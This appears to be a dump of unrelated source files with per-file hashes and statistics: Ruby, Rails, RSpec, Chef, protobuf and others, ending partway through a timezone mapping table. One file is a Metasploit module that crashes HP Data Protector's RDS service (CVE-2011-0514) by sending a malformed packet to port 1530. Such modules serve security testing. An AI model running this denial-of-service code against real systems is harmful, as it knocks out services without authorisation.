e9f6079e1e246c20a2bf59426b2477fd7a534510 | 806 | Pod::Spec.new do |spec|
spec.cocoapods_version = '>= 1.0'
spec.name = "Instructions"
spec.version = "1.4.0"
spec.summary = "Create walkthroughs and guided tours (with coach marks) in a simple way, using Swift."
spec.homepage = "https://github.com/ephread/Instructions"
spec.license = 'MIT'
spec.author = { "Frédéric Maquin" => "[email protected]" }
spec.source = { :git => "https://github.com/ephread/Instructions.git", :tag => spec.version.to_s }
spec.swift_version = '5.0'
spec.platform = :ios, '9.0'
spec.requires_arc = true
spec.source_files = 'Instructions', 'Sources/**/*.swift'
spec.exclude_files = '**/*+AppExtensions.swift'
spec.resources = ["Sources/**/*.xcassets"]
end
| 40.3 | 113 | 0.593052 |
795ea2354cf9b717c5bc0306dfa1b7bd66509b40 | 2,714 | # Controller for Certificate views
class CertificatesController < ApplicationController
include ActionController::MimeResponds
before_action :set_default_request_format
before_action :require_auth, only: %i[show create update destroy]
before_action :check_current_cert, only: %i[create]
before_action :set_certificate, only: %i[show update destroy]
before_action :forbid_public_user, except: %i[show]
# GET /certificates
# GET /certificates.json
def index
render json: {
error: 'Method not allowed'
}, status: 405
end
# GET /certificates/1
# GET /certificates/1.json
def show
certuser = @certificate.user
unless @apiuser_is_public || @apiuser.admin? || certuser == @apiuser
render json: {
status: 'error',
error: 'Forbidden'
}, status: 403
end
respond_to do |format|
format.json
format.pem do
send_file(@certificate.path) unless @apiuser_is_public
end
end
end
# POST /certificates
# POST /certificates.json
def create
csr = OpenSSL::X509::Request.new params[:csr]
@certificate = ca.sign_csr(csr, @apiuser)
if @certificate.save
render :show, status: :created, location: @certificate
else
render json: @certificate.errors, status: :unprocessable_entity
end
end
# PATCH/PUT /certificates/1
# PATCH/PUT /certificates/1.json
def update
render json: {status: 'error', error: 'Invalid Certificate'}, status: 422 and return unless @certificate.active?
render json: {status: 'error', error: 'Bad parameters'}, status: 422 and return unless params[:valid].to_s == "false"
if @certificate.update(active: false, revoked: true, valid_until: Time.now)
render :show, status: :ok, location: @certificate
else
render json: @certificate.errors, status: :unprocessable_entity
end
end
# DELETE /certificates/1
# DELETE /certificates/1.json
def destroy
if @apiuser.admin?
File.delete(@certificate.path)
@certificate.destroy
else
render json: {
status: 'error',
error: 'forbidden'
}, status: :forbidden
end
end
private
# Render 422 if a user still has an old certificate when creating a new one
def check_current_cert
results = Certificate.where(user: @apiuser, active: true)
return unless results.exists?
render json: {
status: 'error',
error: 'Unrevoked certificate',
revoke_url: url_for(results.first)
}, status: :unprocessable_entity
end
# Use callbacks to share common setup or constraints between actions.
def set_certificate
@certificate = Certificate.find(params[:id])
end
def ca
CA.instance
end
end
| 27.414141 | 121 | 0.683861 |
6ad4ee5e1d30a0c4ec87666c26caaf2f76446794 | 1,570 | module RailsUtil
# `RailsUtil::Util` includes class helper methods for handling nested hashes
module Util
# Deep merges a nested hash given a path
# Does not mutate the original hash
# @param [String, Array] path the nested keys
# @param [String, Integer, Array] value the value of nested path key
# @param [Hash] obj the hash object to merge
# @return [Hash] the nested hash
def self.set_nested(path, value, obj={})
obj.deep_merge(path_to_hash(path, value))
end
# Deep merges a nested hash given a path
# Mutates the original hash
# @param [String, Array] path the nested keys
# @param [String, Integer, Array] value the value of nested path key
# @param [Hash] obj the hash object to merge
# @return [Hash] the nested hash
def self.set_nested!(path, value, obj={})
obj.deep_merge!(path_to_hash(path, value))
end
# Creates a nested hash given a path
# @param [String, Array] path the nested keys
# @param [String, Integer, Array] value the value of nested path key
# @return [Hash] the nested hash
def self.path_to_hash(path, value)
parts = (path.is_a?(String) ? path.split('.') : path).reverse
initial = { parts.shift => value }
parts.reduce(initial) { |a, e| { e => a } }
end
# Returns the underscored class name of an `ActiveRecord` object
# @param [ActiveRecord Object] the `ActiveRecord` object
# @return [String] underscored class name
def self.underscored_class_name(obj)
obj.class.to_s.underscore
end
end
end | 38.292683 | 78 | 0.668153 |
f876c6928bc879e99e412e33268eb38391d59d1c | 122 | etcd_installation_binary 'default' do
action :create
end
etcd_service_manager_systemd 'default' do
action :start
end
| 15.25 | 41 | 0.811475 |
87c97396a1510e6d6a488c7727f5f2bf1400437b | 4,055 | require 'spec_helper'
describe VCSToolkit::Diff do
describe 'instance' do
subject { described_class.from_sequences(%w(a b c d), %w(a b d e)) }
it { should be_a_kind_of Enumerable }
it { should respond_to :each }
it { should respond_to :has_changes? }
it { should respond_to :to_s }
it { should respond_to :new_content }
end
let(:diff_with_addition) { described_class.from_sequences(%w(a b c d), %w(a b c d e)) }
let(:diff_with_removal) { described_class.from_sequences(%w(a b c d), %w(a b d)) }
let(:diff_with_changes) { described_class.from_sequences(%w(a b c d), %w(a c c d)) }
let(:diff_without_changes) { described_class.from_sequences(%w(a b c d), %w(a b c d)) }
let(:diff_with_conflicts) { described_class.new([double(VCSToolkit::Conflict, conflict?: true)]) }
describe '#has_changes?' do
context 'with no changes' do
subject { diff_without_changes.has_changes? }
it { should be_false }
end
context 'with changes' do
subject { diff_with_changes.has_changes? }
it('should equal true') { should be_true }
end
end
describe '#has_conflicts?' do
context 'with no conflicts' do
subject { diff_with_changes.has_conflicts? }
it { should be_false }
end
context 'with conflicts' do
subject { diff_with_conflicts.has_conflicts? }
it('should equal true') { should be_true }
end
end
describe 'changes' do
context 'with no changes' do
subject { diff_without_changes }
it { should have_exactly(4).items }
it 'has no changes' do
should be_all { |change| change.unchanged? }
end
end
context 'with changes' do
subject { diff_with_changes }
it 'has a changed item' do
should be_any { |change| change.changed? }
end
end
context 'with addition' do
subject { diff_with_addition }
it 'has an addition change' do
should be_any { |change| change.adding? }
end
end
context 'with removal' do
subject { diff_with_removal }
it 'has a removal change' do
should be_any { |change| change.deleting? }
end
end
end
describe '#to_s' do
context 'with no changes' do
subject { diff_without_changes.to_s }
it { should eq 'abcd' }
end
context 'with addition' do
subject { diff_with_addition.to_s }
it { should eq 'abcd+e' }
end
context 'with removal' do
subject { diff_with_removal.to_s }
it { should eq 'ab-cd' }
end
context 'with changes' do
subject { diff_with_changes.to_s }
it { should eq 'a-b+ccd' }
end
it 'should keep newlines intact' do
file_one = "one\ntwo\nthree\nfour\n".lines
file_two = "one\ntwo!\nthree :)\nfour\nfive...\n".lines
diff = described_class.from_sequences(file_one, file_two).to_s
expect(diff).to eq "one\n-two\n+two!\n-three\n+three :)\nfour\n+five...\n"
end
end
describe '#new_content' do
context 'with no changes' do
subject { diff_without_changes.new_content('|', '!', '|') }
it { should eq %w(a b c d) }
end
context 'with addition' do
subject { diff_with_addition.new_content('|', '!', '|') }
it { should eq %w(a b c d e) }
end
context 'with removal' do
subject { diff_with_removal.new_content('|', '!', '|') }
it { should eq %w(a b d) }
end
context 'with changes' do
subject { diff_with_changes.new_content('|', '!', '|') }
it { should eq %w(a c c d) }
end
context 'with conflicts' do
subject { VCSToolkit::Merge.three_way(%w(a b c d), %w(a f c d), %w(a e c d)).new_content }
it { should eq %w(a <<< f >>> e === c d) }
end
context 'with conflicts format' do
subject { VCSToolkit::Merge.three_way(%w(a b c d), %w(a f c d), %w(a e c d)).new_content('(', '|', ')') }
it { should eq %w(a ( f | e ) c d) }
end
end
end | 28.159722 | 111 | 0.597041 |
bfbec5a18ecac781e2ef95c21639812077200115 | 291 | class CreatePledges < ActiveRecord::Migration
def change
create_table :pledges do |t|
t.string :name
t.string :email
t.text :comment
t.decimal :amount
t.references :project, index: true, foreign_key: true
t.timestamps null: false
end
end
end
| 20.785714 | 59 | 0.652921 |
113b0df7cfc0d2f7adb5fe2e9e29907c68af10d4 | 1,330 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/api/quota.proto
require 'google/protobuf'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/api/quota.proto", :syntax => :proto3) do
add_message "google.api.Quota" do
repeated :limits, :message, 3, "google.api.QuotaLimit"
repeated :metric_rules, :message, 4, "google.api.MetricRule"
end
add_message "google.api.MetricRule" do
optional :selector, :string, 1
map :metric_costs, :string, :int64, 2
end
add_message "google.api.QuotaLimit" do
optional :name, :string, 6
optional :description, :string, 2
optional :default_limit, :int64, 3
optional :max_limit, :int64, 4
optional :free_tier, :int64, 7
optional :duration, :string, 5
optional :metric, :string, 8
optional :unit, :string, 9
map :values, :string, :int64, 10
optional :display_name, :string, 12
end
end
end
module Google
module Api
Quota = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.api.Quota").msgclass
MetricRule = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.api.MetricRule").msgclass
QuotaLimit = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.api.QuotaLimit").msgclass
end
end
| 35 | 107 | 0.697744 |
11029de6750e1b79a78e2b4d65c04a9882e1585c | 1,301 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Data Protector Manager RDS DOS',
'Description' => %q{
This module causes a remote DOS on HP Data Protector's RDS service. By sending
a malformed packet to port 1530, _rm32.dll causes RDS to crash due to an enormous
size for malloc().
},
'Author' =>
[
'Roi Mallo <rmallof[at]gmail.com>', #initial discovery, poc
'sinn3r', #msf
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-0514' ],
[ 'OSVDB', '70617' ],
[ 'EDB', '15940' ],
],
'DisclosureDate' => 'Jan 8 2011' ))
register_options([
Opt::RPORT(1530),
])
end
def run
buf = "\x23\x8c\x29\xb6" #Header
buf << "\x64\x00\x00\x00" #Packet size
buf << "\x41"*4 #Data
connect
print_status("Sending malformed packet...")
sock.put(buf)
disconnect
end
end
| 25.509804 | 89 | 0.550346 |
012519463fb7ea06bec527f7ababdb7b280f73bb | 174 | module Events
class NoteOnWorkfile < Note
has_targets :workfile
has_activities :actor, :workfile, :workspace
include_shared_search_fields(:workspace)
end
end | 21.75 | 48 | 0.764368 |
fffb40dfbe70a9084397827b2917eca5be3b73ea | 1,554 | module Guard
module UI
class << self
def info(message, options = {})
unless ENV["GUARD_ENV"] == "test"
reset_line if options[:reset]
puts reset_color(message) if message != ''
end
end
def error(message, options = {})
unless ENV["GUARD_ENV"] == "test"
reset_line if options[:reset]
puts "ERROR: #{message}"
end
end
def debug(message, options = {})
unless ENV["GUARD_ENV"] == "test"
reset_line if options[:reset]
puts "DEBUG: #{message}" if ::Guard.options && ::Guard.options[:debug]
end
end
def reset_line
if color_enabled?
print "\r\e[0m"
else
print "\r\n"
end
end
def clear
system("clear;")
end
private
def reset_color(text)
color(text, "\e[0m")
end
def color(text, color_code)
if color_enabled?
return "#{color_code}#{text}\e[0m"
else
return text
end
end
def color_enabled?
@color_enabled ||= if Config::CONFIG['target_os'] =~ /mswin|mingw/i
unless ENV['ANSICON']
begin
require 'rubygems' unless ENV['NO_RUBYGEMS']
require 'Win32/Console/ANSI'
rescue LoadError
info "You must 'gem install win32console' to use color on Windows"
false
end
end
else
true
end
end
end
end
end
| 21.887324 | 80 | 0.503218 |
91df4dd558edec5db2787fb40c41ee8d1c169a4c | 37,828 | module OMS
class RetryRequestException < Exception
# Throw this exception to tell the fluentd engine to retry and
# inform the output plugin that it is indeed retryable
end
class Common
require 'json'
require 'net/http'
require 'net/https'
require 'time'
require 'zlib'
require 'digest'
require 'date'
require 'securerandom'
require_relative 'omslog'
require_relative 'oms_configuration'
@@OSFullName = nil
@@OSName = nil
@@OSVersion = nil
@@Hostname = nil
@@FQDN = nil
@@InstalledDate = nil
@@AgentVersion = nil
@@CurrentTimeZone = nil
@@tzMapping = {
'Australia/Darwin' => 'AUS Central Standard Time',
'Australia/Sydney' => 'AUS Eastern Standard Time',
'Australia/Melbourne' => 'AUS Eastern Standard Time',
'Asia/Kabul' => 'Afghanistan Standard Time',
'America/Anchorage' => 'Alaskan Standard Time',
'America/Juneau' => 'Alaskan Standard Time',
'America/Metlakatla' => 'Alaskan Standard Time',
'America/Nome' => 'Alaskan Standard Time',
'America/Sitka' => 'Alaskan Standard Time',
'America/Yakutat' => 'Alaskan Standard Time',
'Asia/Riyadh' => 'Arab Standard Time',
'Asia/Bahrain' => 'Arab Standard Time',
'Asia/Kuwait' => 'Arab Standard Time',
'Asia/Qatar' => 'Arab Standard Time',
'Asia/Aden' => 'Arab Standard Time',
'Asia/Dubai' => 'Arabian Standard Time',
'Asia/Muscat' => 'Arabian Standard Time',
'Etc/GMT-4' => 'Arabian Standard Time',
'Asia/Baghdad' => 'Arabic Standard Time',
'America/Buenos_Aires' => 'Argentina Standard Time',
'America/Argentina/La_Rioja' => 'Argentina Standard Time',
'America/Argentina/Rio_Gallegos' => 'Argentina Standard Time',
'America/Argentina/Salta' => 'Argentina Standard Time',
'America/Argentina/San_Juan' => 'Argentina Standard Time',
'America/Argentina/San_Luis' => 'Argentina Standard Time',
'America/Argentina/Tucuman' => 'Argentina Standard Time',
'America/Argentina/Ushuaia' => 'Argentina Standard Time',
'America/Catamarca' => 'Argentina Standard Time',
'America/Cordoba' => 'Argentina Standard Time',
'America/Jujuy' => 'Argentina Standard Time',
'America/Mendoza' => 'Argentina Standard Time',
'America/Halifax' => 'Atlantic Standard Time',
'Atlantic/Bermuda' => 'Atlantic Standard Time',
'America/Glace_Bay' => 'Atlantic Standard Time',
'America/Goose_Bay' => 'Atlantic Standard Time',
'America/Moncton' => 'Atlantic Standard Time',
'America/Thule' => 'Atlantic Standard Time',
'Asia/Baku' => 'Azerbaijan Standard Time',
'Atlantic/Azores' => 'Azores Standard Time',
'America/Scoresbysund' => 'Azores Standard Time',
'America/Bahia' => 'Bahia Standard Time',
'Asia/Dhaka' => 'Bangladesh Standard Time',
'Asia/Thimphu' => 'Bangladesh Standard Time',
'Europe/Minsk' => 'Belarus Standard Time',
'America/Regina' => 'Canada Central Standard Time',
'America/Swift_Current' => 'Canada Central Standard Time',
'Atlantic/Cape_Verde' => 'Cape Verde Standard Time',
'Etc/GMT+1' => 'Cape Verde Standard Time',
'Asia/Yerevan' => 'Caucasus Standard Time',
'Australia/Adelaide' => 'Cen. Australia Standard Time',
'Australia/Broken_Hill' => 'Cen. Australia Standard Time',
'America/Guatemala' => 'Central America Standard Time',
'America/Belize' => 'Central America Standard Time',
'America/Costa_Rica' => 'Central America Standard Time',
'Pacific/Galapagos' => 'Central America Standard Time',
'America/Tegucigalpa' => 'Central America Standard Time',
'America/Managua' => 'Central America Standard Time',
'America/El_Salvador' => 'Central America Standard Time',
'Etc/GMT+6' => 'Central America Standard Time',
'Asia/Almaty' => 'Central Asia Standard Time',
'Antarctica/Vostok' => 'Central Asia Standard Time',
'Indian/Chagos' => 'Central Asia Standard Time',
'Asia/Bishkek' => 'Central Asia Standard Time',
'Asia/Qyzylorda' => 'Central Asia Standard Time',
'Etc/GMT-6' => 'Central Asia Standard Time',
'America/Cuiaba' => 'Central Brazilian Standard Time',
'America/Campo_Grande' => 'Central Brazilian Standard Time',
'Europe/Budapest' => 'Central Europe Standard Time',
'Europe/Tirane' => 'Central Europe Standard Time',
'Europe/Prague' => 'Central Europe Standard Time',
'Europe/Podgorica' => 'Central Europe Standard Time',
'Europe/Belgrade' => 'Central Europe Standard Time',
'Europe/Ljubljana' => 'Central Europe Standard Time',
'Europe/Bratislava' => 'Central Europe Standard Time',
'Europe/Warsaw' => 'Central European Standard Time',
'Europe/Sarajevo' => 'Central European Standard Time',
'Europe/Zagreb' => 'Central European Standard Time',
'Europe/Skopje' => 'Central European Standard Time',
'Pacific/Guadalcanal' => 'Central Pacific Standard Time',
'Antarctica/Macquarie' => 'Central Pacific Standard Time',
'Pacific/Ponape' => 'Central Pacific Standard Time',
'Pacific/Kosrae' => 'Central Pacific Standard Time',
'Pacific/Noumea' => 'Central Pacific Standard Time',
'Pacific/Norfolk' => 'Central Pacific Standard Time',
'Pacific/Bougainville' => 'Central Pacific Standard Time',
'Pacific/Efate' => 'Central Pacific Standard Time',
'Etc/GMT-11' => 'Central Pacific Standard Time',
'America/Chicago' => 'Central Standard Time',
'America/Winnipeg' => 'Central Standard Time',
'America/Rainy_River' => 'Central Standard Time',
'America/Rankin_Inlet' => 'Central Standard Time',
'America/Resolute' => 'Central Standard Time',
'America/Matamoros' => 'Central Standard Time',
'America/Indiana/Knox' => 'Central Standard Time',
'America/Indiana/Tell_City' => 'Central Standard Time',
'America/Menominee' => 'Central Standard Time',
'America/North_Dakota/Beulah' => 'Central Standard Time',
'America/North_Dakota/Center' => 'Central Standard Time',
'America/North_Dakota/New_Salem' => 'Central Standard Time',
'CST6CDT' => 'Central Standard Time',
'America/Mexico_City' => 'Central Standard Time (Mexico)',
'America/Bahia_Banderas' => 'Central Standard Time (Mexico)',
'America/Merida' => 'Central Standard Time (Mexico)',
'America/Monterrey' => 'Central Standard Time (Mexico)',
'Asia/Shanghai' => 'China Standard Time',
'Asia/Chongqing' => 'China Standard Time',
'Asia/Harbin' => 'China Standard Time',
'Asia/Kashgar' => 'China Standard Time',
'Asia/Urumqi' => 'China Standard Time',
'Asia/Hong_Kong' => 'China Standard Time',
'Asia/Macau' => 'China Standard Time',
'Etc/GMT+12' => 'Dateline Standard Time',
'Africa/Nairobi' => 'E. Africa Standard Time',
'Antarctica/Syowa' => 'E. Africa Standard Time',
'Africa/Djibouti' => 'E. Africa Standard Time',
'Africa/Asmera' => 'E. Africa Standard Time',
'Africa/Addis_Ababa' => 'E. Africa Standard Time',
'Indian/Comoro' => 'E. Africa Standard Time',
'Indian/Antananarivo' => 'E. Africa Standard Time',
'Africa/Khartoum' => 'E. Africa Standard Time',
'Africa/Mogadishu' => 'E. Africa Standard Time',
'Africa/Juba' => 'E. Africa Standard Time',
'Africa/Dar_es_Salaam' => 'E. Africa Standard Time',
'Africa/Kampala' => 'E. Africa Standard Time',
'Indian/Mayotte' => 'E. Africa Standard Time',
'Etc/GMT-3' => 'E. Africa Standard Time',
'Australia/Brisbane' => 'E. Australia Standard Time',
'Australia/Lindeman' => 'E. Australia Standard Time',
'Europe/Chisinau' => 'E. Europe Standard Time',
'America/Sao_Paulo' => 'E. South America Standard Time',
'America/New_York' => 'Eastern Standard Time',
'America/Nassau' => 'Eastern Standard Time',
'America/Toronto' => 'Eastern Standard Time',
'America/Iqaluit' => 'Eastern Standard Time',
'America/Montreal' => 'Eastern Standard Time',
'America/Nipigon' => 'Eastern Standard Time',
'America/Pangnirtung' => 'Eastern Standard Time',
'America/Thunder_Bay' => 'Eastern Standard Time',
'America/Havana' => 'Eastern Standard Time',
'America/Port-au-Prince' => 'Eastern Standard Time',
'America/Detroit' => 'Eastern Standard Time',
'America/Indiana/Petersburg' => 'Eastern Standard Time',
'America/Indiana/Vincennes' => 'Eastern Standard Time',
'America/Indiana/Winamac' => 'Eastern Standard Time',
'America/Kentucky/Monticello' => 'Eastern Standard Time',
'America/Louisville' => 'Eastern Standard Time',
'EST5EDT' => 'Eastern Standard Time',
'America/Cancun' => 'Eastern Standard Time (Mexico)',
'Africa/Cairo' => 'Egypt Standard Time',
'Asia/Gaza' => 'Egypt Standard Time',
'Asia/Hebron' => 'Egypt Standard Time',
'Asia/Yekaterinburg' => 'Ekaterinburg Standard Time',
'Europe/Kiev' => 'FLE Standard Time',
'Europe/Mariehamn' => 'FLE Standard Time',
'Europe/Sofia' => 'FLE Standard Time',
'Europe/Tallinn' => 'FLE Standard Time',
'Europe/Helsinki' => 'FLE Standard Time',
'Europe/Vilnius' => 'FLE Standard Time',
'Europe/Riga' => 'FLE Standard Time',
'Europe/Uzhgorod' => 'FLE Standard Time',
'Europe/Zaporozhye' => 'FLE Standard Time',
'Pacific/Fiji' => 'Fiji Standard Time',
'Europe/London' => 'GMT Standard Time',
'Atlantic/Canary' => 'GMT Standard Time',
'Atlantic/Faeroe' => 'GMT Standard Time',
'Europe/Guernsey' => 'GMT Standard Time',
'Europe/Dublin' => 'GMT Standard Time',
'Europe/Isle_of_Man' => 'GMT Standard Time',
'Europe/Jersey' => 'GMT Standard Time',
'Europe/Lisbon' => 'GMT Standard Time',
'Atlantic/Madeira' => 'GMT Standard Time',
'Europe/Bucharest' => 'GTB Standard Time',
'Asia/Nicosia' => 'GTB Standard Time',
'Europe/Athens' => 'GTB Standard Time',
'Asia/Tbilisi' => 'Georgian Standard Time',
'America/Godthab' => 'Greenland Standard Time',
'Atlantic/Reykjavik' => 'Greenwich Standard Time',
'Africa/Ouagadougou' => 'Greenwich Standard Time',
'Africa/Abidjan' => 'Greenwich Standard Time',
'Africa/Accra' => 'Greenwich Standard Time',
'Africa/Banjul' => 'Greenwich Standard Time',
'Africa/Conakry' => 'Greenwich Standard Time',
'Africa/Bissau' => 'Greenwich Standard Time',
'Africa/Monrovia' => 'Greenwich Standard Time',
'Africa/Bamako' => 'Greenwich Standard Time',
'Africa/Nouakchott' => 'Greenwich Standard Time',
'Atlantic/St_Helena' => 'Greenwich Standard Time',
'Africa/Freetown' => 'Greenwich Standard Time',
'Africa/Dakar' => 'Greenwich Standard Time',
'Africa/Sao_Tome' => 'Greenwich Standard Time',
'Africa/Lome' => 'Greenwich Standard Time',
'Pacific/Honolulu' => 'Hawaiian Standard Time',
'Pacific/Rarotonga' => 'Hawaiian Standard Time',
'Pacific/Tahiti' => 'Hawaiian Standard Time',
'Pacific/Johnston' => 'Hawaiian Standard Time',
'Etc/GMT+10' => 'Hawaiian Standard Time',
'Asia/Calcutta' => 'India Standard Time',
'Asia/Tehran' => 'Iran Standard Time',
'Asia/Jerusalem' => 'Israel Standard Time',
'Asia/Amman' => 'Jordan Standard Time',
'Europe/Kaliningrad' => 'Kaliningrad Standard Time',
'Asia/Seoul' => 'Korea Standard Time',
'Africa/Tripoli' => 'Libya Standard Time',
'Pacific/Kiritimati' => 'Line Islands Standard Time',
'Etc/GMT-14' => 'Line Islands Standard Time',
'Asia/Magadan' => 'Magadan Standard Time',
'Indian/Mauritius' => 'Mauritius Standard Time',
'Indian/Reunion' => 'Mauritius Standard Time',
'Indian/Mahe' => 'Mauritius Standard Time',
'Asia/Beirut' => 'Middle East Standard Time',
'America/Montevideo' => 'Montevideo Standard Time',
'Africa/Casablanca' => 'Morocco Standard Time',
'Africa/El_Aaiun' => 'Morocco Standard Time',
'America/Denver' => 'Mountain Standard Time',
'America/Edmonton' => 'Mountain Standard Time',
'America/Cambridge_Bay' => 'Mountain Standard Time',
'America/Inuvik' => 'Mountain Standard Time',
'America/Yellowknife' => 'Mountain Standard Time',
'America/Ojinaga' => 'Mountain Standard Time',
'America/Boise' => 'Mountain Standard Time',
'MST7MDT' => 'Mountain Standard Time',
'America/Chihuahua' => 'Mountain Standard Time (Mexico)',
'America/Mazatlan' => 'Mountain Standard Time (Mexico)',
'Asia/Rangoon' => 'Myanmar Standard Time',
'Indian/Cocos' => 'Myanmar Standard Time',
'Asia/Novosibirsk' => 'N. Central Asia Standard Time',
'Asia/Omsk' => 'N. Central Asia Standard Time',
'Africa/Windhoek' => 'Namibia Standard Time',
'Asia/Katmandu' => 'Nepal Standard Time',
'Pacific/Auckland' => 'New Zealand Standard Time',
'Antarctica/McMurdo' => 'New Zealand Standard Time',
'America/St_Johns' => 'Newfoundland Standard Time',
'Asia/Irkutsk' => 'North Asia East Standard Time',
'Asia/Krasnoyarsk' => 'North Asia Standard Time',
'Asia/Novokuznetsk' => 'North Asia Standard Time',
'Asia/Pyongyang' => 'North Korea Standard Time',
'America/Santiago' => 'Pacific SA Standard Time',
'Antarctica/Palmer' => 'Pacific SA Standard Time',
'America/Los_Angeles' => 'Pacific Standard Time',
'America/Vancouver' => 'Pacific Standard Time',
'America/Dawson' => 'Pacific Standard Time',
'America/Whitehorse' => 'Pacific Standard Time',
'America/Tijuana' => 'Pacific Standard Time',
'America/Santa_Isabel' => 'Pacific Standard Time',
'PST8PDT' => 'Pacific Standard Time',
'Asia/Karachi' => 'Pakistan Standard Time',
'America/Asuncion' => 'Paraguay Standard Time',
'Europe/Paris' => 'Romance Standard Time',
'Europe/Brussels' => 'Romance Standard Time',
'Europe/Copenhagen' => 'Romance Standard Time',
'Europe/Madrid' => 'Romance Standard Time',
'Africa/Ceuta' => 'Romance Standard Time',
'Asia/Srednekolymsk' => 'Russia Time Zone 10',
'Asia/Kamchatka' => 'Russia Time Zone 11',
'Asia/Anadyr' => 'Russia Time Zone 11',
'Europe/Samara' => 'Russia Time Zone 3',
'Europe/Moscow' => 'Russian Standard Time',
'Europe/Simferopol' => 'Russian Standard Time',
'Europe/Volgograd' => 'Russian Standard Time',
'America/Cayenne' => 'SA Eastern Standard Time',
'Antarctica/Rothera' => 'SA Eastern Standard Time',
'America/Fortaleza' => 'SA Eastern Standard Time',
'America/Araguaina' => 'SA Eastern Standard Time',
'America/Belem' => 'SA Eastern Standard Time',
'America/Maceio' => 'SA Eastern Standard Time',
'America/Recife' => 'SA Eastern Standard Time',
'America/Santarem' => 'SA Eastern Standard Time',
'Atlantic/Stanley' => 'SA Eastern Standard Time',
'America/Paramaribo' => 'SA Eastern Standard Time',
'Etc/GMT+3' => 'SA Eastern Standard Time',
'America/Bogota' => 'SA Pacific Standard Time',
'America/Rio_Branco' => 'SA Pacific Standard Time',
'America/Eirunepe' => 'SA Pacific Standard Time',
'America/Coral_Harbour' => 'SA Pacific Standard Time',
'Pacific/Easter' => 'SA Pacific Standard Time',
'America/Guayaquil' => 'SA Pacific Standard Time',
'America/Jamaica' => 'SA Pacific Standard Time',
'America/Cayman' => 'SA Pacific Standard Time',
'America/Panama' => 'SA Pacific Standard Time',
'America/Lima' => 'SA Pacific Standard Time',
'Etc/GMT+5' => 'SA Pacific Standard Time',
'America/La_Paz' => 'SA Western Standard Time',
'America/Antigua' => 'SA Western Standard Time',
'America/Anguilla' => 'SA Western Standard Time',
'America/Aruba' => 'SA Western Standard Time',
'America/Barbados' => 'SA Western Standard Time',
'America/St_Barthelemy' => 'SA Western Standard Time',
'America/Kralendijk' => 'SA Western Standard Time',
'America/Manaus' => 'SA Western Standard Time',
'America/Boa_Vista' => 'SA Western Standard Time',
'America/Porto_Velho' => 'SA Western Standard Time',
'America/Blanc-Sablon' => 'SA Western Standard Time',
'America/Curacao' => 'SA Western Standard Time',
'America/Dominica' => 'SA Western Standard Time',
'America/Santo_Domingo' => 'SA Western Standard Time',
'America/Grenada' => 'SA Western Standard Time',
'America/Guadeloupe' => 'SA Western Standard Time',
'America/Guyana' => 'SA Western Standard Time',
'America/St_Kitts' => 'SA Western Standard Time',
'America/St_Lucia' => 'SA Western Standard Time',
'America/Marigot' => 'SA Western Standard Time',
'America/Martinique' => 'SA Western Standard Time',
'America/Montserrat' => 'SA Western Standard Time',
'America/Puerto_Rico' => 'SA Western Standard Time',
'America/Lower_Princes' => 'SA Western Standard Time',
'America/Grand_Turk' => 'SA Western Standard Time',
'America/Port_of_Spain' => 'SA Western Standard Time',
'America/St_Vincent' => 'SA Western Standard Time',
'America/Tortola' => 'SA Western Standard Time',
'America/St_Thomas' => 'SA Western Standard Time',
'Etc/GMT+4' => 'SA Western Standard Time',
'Asia/Bangkok' => 'SE Asia Standard Time',
'Antarctica/Davis' => 'SE Asia Standard Time',
'Indian/Christmas' => 'SE Asia Standard Time',
'Asia/Jakarta' => 'SE Asia Standard Time',
'Asia/Pontianak' => 'SE Asia Standard Time',
'Asia/Phnom_Penh' => 'SE Asia Standard Time',
'Asia/Vientiane' => 'SE Asia Standard Time',
'Asia/Hovd' => 'SE Asia Standard Time',
'Asia/Saigon' => 'SE Asia Standard Time',
'Etc/GMT-7' => 'SE Asia Standard Time',
'Pacific/Apia' => 'Samoa Standard Time',
'Asia/Singapore' => 'Singapore Standard Time',
'Asia/Brunei' => 'Singapore Standard Time',
'Asia/Makassar' => 'Singapore Standard Time',
'Asia/Kuala_Lumpur' => 'Singapore Standard Time',
'Asia/Kuching' => 'Singapore Standard Time',
'Asia/Manila' => 'Singapore Standard Time',
'Etc/GMT-8' => 'Singapore Standard Time',
'Africa/Johannesburg' => 'South Africa Standard Time',
'Africa/Bujumbura' => 'South Africa Standard Time',
'Africa/Gaborone' => 'South Africa Standard Time',
'Africa/Lubumbashi' => 'South Africa Standard Time',
'Africa/Maseru' => 'South Africa Standard Time',
'Africa/Blantyre' => 'South Africa Standard Time',
'Africa/Maputo' => 'South Africa Standard Time',
'Africa/Kigali' => 'South Africa Standard Time',
'Africa/Mbabane' => 'South Africa Standard Time',
'Africa/Lusaka' => 'South Africa Standard Time',
'Africa/Harare' => 'South Africa Standard Time',
'Etc/GMT-2' => 'South Africa Standard Time',
'Asia/Colombo' => 'Sri Lanka Standard Time',
'Asia/Damascus' => 'Syria Standard Time',
'Asia/Taipei' => 'Taipei Standard Time',
'Australia/Hobart' => 'Tasmania Standard Time',
'Australia/Currie' => 'Tasmania Standard Time',
'Asia/Tokyo' => 'Tokyo Standard Time',
'Asia/Jayapura' => 'Tokyo Standard Time',
'Pacific/Palau' => 'Tokyo Standard Time',
'Asia/Dili' => 'Tokyo Standard Time',
'Etc/GMT-9' => 'Tokyo Standard Time',
'Pacific/Tongatapu' => 'Tonga Standard Time',
'Pacific/Enderbury' => 'Tonga Standard Time',
'Pacific/Fakaofo' => 'Tonga Standard Time',
'Etc/GMT-13' => 'Tonga Standard Time',
'Europe/Istanbul' => 'Turkey Standard Time',
'America/Indianapolis' => 'US Eastern Standard Time',
'America/Indiana/Marengo' => 'US Eastern Standard Time',
'America/Indiana/Vevay' => 'US Eastern Standard Time',
'America/Phoenix' => 'US Mountain Standard Time',
'America/Dawson_Creek' => 'US Mountain Standard Time',
'America/Creston' => 'US Mountain Standard Time',
'America/Fort_Nelson' => 'US Mountain Standard Time',
'America/Hermosillo' => 'US Mountain Standard Time',
